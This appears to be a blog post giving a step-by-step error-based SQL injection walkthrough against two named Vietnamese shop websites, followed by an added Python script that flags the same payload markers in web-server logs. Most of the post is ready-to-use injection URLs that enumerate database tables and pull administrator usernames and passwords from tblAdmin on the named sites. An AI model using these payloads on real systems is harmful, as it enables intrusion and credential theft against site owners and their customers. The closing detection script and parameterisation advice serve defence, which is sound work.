
SQLi hack for aspx




Victim: http://myson.vn/Product_detail.asp?pID='ThinkCentre A70'
Append ' to the pID value to check for the error.
Find the table names:
http://myson.vn/Product_detail.asp?pID='ThinkCentre A70' and 1= convert(int, (select top 1 table_name from information_schema.tables))
This returns the table 'D99_Tmp'.
Continue:
http://myson.vn/Product_detail.asp?pID='ThinkCentre A70' and 1= convert(int, (select top 1 table_name from information_schema.tables where table_name not in ('D99_Tmp')))

http://myson.vn/Product_detail.asp?pID='ThinkCentre A70' and 1= convert(int, (select top 1 table_name from information_schema.tables where table_name not in ('D99_Tmp', 'dtproperties')))

http://myson.vn/Product_detail.asp?pID='ThinkCentre A70' and 1= convert(int, (select top 1 table_name from information_schema.tables where table_name not in ('D99_Tmp', 'dtproperties', 'tblAdmin' )))

Find the columns in tblAdmin:
http://myson.vn/Product_detail.asp?pID='ThinkCentre A70' and 1= convert(int, (select top 1 column_name from information_schema.columns where table_name = 'tblAdmin'))

http://myson.vn/Product_detail.asp?pID='ThinkCentre A70' and 1= convert(int, (select top 1 column_name from information_schema.columns where table_name = 'tblAdmin' and column_name not in ('AID')))

http://myson.vn/Product_detail.asp?pID='ThinkCentre A70' and 1= convert(int, (select top 1 column_name from information_schema.columns where table_name = 'tblAdmin' and column_name not in ('AID','ALogin')))

Get the user information:

http://myson.vn/Product_detail.asp?pID='ThinkCentre A70' and 1= convert(int, (select top 1 ALogin from tblAdmin))

http://myson.vn/Product_detail.asp?pID='ThinkCentre A70' and 1= convert(int, (select top 1 ALogin from tblAdmin where ALogin not in ('Administrator')))

Get the login password:
http://myson.vn/Product_detail.asp?pID='ThinkCentre A70' and 1= convert(int, (select top 1 APass from tblAdmin ))  // password of Administrator

http://myson.vn/Product_detail.asp?pID='ThinkCentre A70' and 1= convert(int, (select top 1 APass from tblAdmin where ALogin not in ('Administrator') ))  // password of the second user.









http://www.hienshop.vn/ProductDetail/1672/198 and 1=convert(int,@@version)/Default.aspx

http://www.hienshop.vn/ProductDetail/1672/198 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('tblCategory','tblComment','tblfooter','tbllienhe','tblLogo','tblNews','tblOrder','tblOrderDetail')))/Default.aspx

http://www.hienshop.vn/ProductDetail/1672/198 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='tblAdmin'))/Default.aspx

http://www.hienshop.vn/ProductDetail/1672/198 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='tblAdmin' and column_name not in ('AdminID','UserName','PassWord')))/Default.aspx


http://www.hienshop.vn/ProductDetail/1672/198 and 1=convert(int,(select top 1 UserName from tblAdmin))/Default.aspx
http://www.hienshop.vn/ProductDetail/1672/198 and 1=convert(int,(select top 1 PassWord from tblAdmin))/Default.aspx
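
For defenders, every request in this walkthrough carries the same markers: a 1=convert(int, ...) comparison, often with information_schema lookups and a growing not in (...) list. The script below is an added example, not part of the original post, that flags those markers in web-server logs; the log lines are constructed, and the field layout, rule names and function names are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed log lines: date time client-ip method uri-stem uri-query status
SAMPLE_LOG = """\
2015-03-02 10:01:11 203.0.113.7 GET /Product_detail.asp pID=%27ThinkCentre+A70%27 200
2015-03-02 10:01:15 203.0.113.7 GET /Product_detail.asp pID=%27x%27+and+1=+convert(int,(select+top+1+table_name+from+information_schema.tables)) 500
2015-03-02 10:01:20 203.0.113.7 GET /Product_detail.asp pID=%27x%27+AND+1=CONVERT(int,(select+top+1+column_name+from+information_schema.columns+where+column_name+not+in+(%27a%27))) 500
2015-03-02 10:02:00 198.51.100.4 GET /ProductDetail/1672/198%20and%201=convert(int,@@version)/Default.aspx - 500
2015-03-02 10:03:00 198.51.100.9 GET /search.aspx q=convert+int+to+string 200
"""

# Markers taken from the requests in the walkthrough above.
RULES = {
    "convert_int_probe": re.compile(r"\b1\s*=\s*convert\s*\(\s*int\s*,", re.I),
    "schema_enumeration": re.compile(r"information_schema\.(tables|columns)", re.I),
    "not_in_iteration": re.compile(r"\bnot\s+in\s*\(", re.I),
    "version_probe": re.compile(r"@@version", re.I),
}

def classify(line):
    """Return (client_ip, status, matched rule names) for one log line, or None."""
    parts = line.split()
    if len(parts) < 7 or not parts[-1].isdigit():
        return None
    ip, stem, query, status = parts[2], parts[4], parts[5], int(parts[-1])
    # Payload may sit in the query or the path; decode twice for double encoding.
    text = unquote_plus(unquote_plus(stem + "?" + query))
    hits = sorted(name for name, rx in RULES.items() if rx.search(text))
    return ip, status, hits

def summarize(log_text):
    """Per client: count of convert(int, ...) probes, rules seen, HTTP 500 replies."""
    report = defaultdict(lambda: {"requests": 0, "rules": set(), "errors_500": 0})
    for line in log_text.splitlines():
        rec = classify(line)
        # Require the comparison itself; bare keywords alone are too noisy.
        if rec is None or "convert_int_probe" not in rec[2]:
            continue
        ip, status, hits = rec
        report[ip]["requests"] += 1
        report[ip]["rules"].update(hits)
        report[ip]["errors_500"] += int(status == 500)
    return dict(report)

if __name__ == "__main__":
    for ip, info in summarize(SAMPLE_LOG).items():
        print(ip, info["requests"], sorted(info["rules"]), info["errors_500"])
```

The fix on the application side is to pass pID as a query parameter instead of concatenating it into the SQL string, and to stop returning database error text to the client.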

All Rights Reserved by Huy Hùng - KMA © 2014 - 2015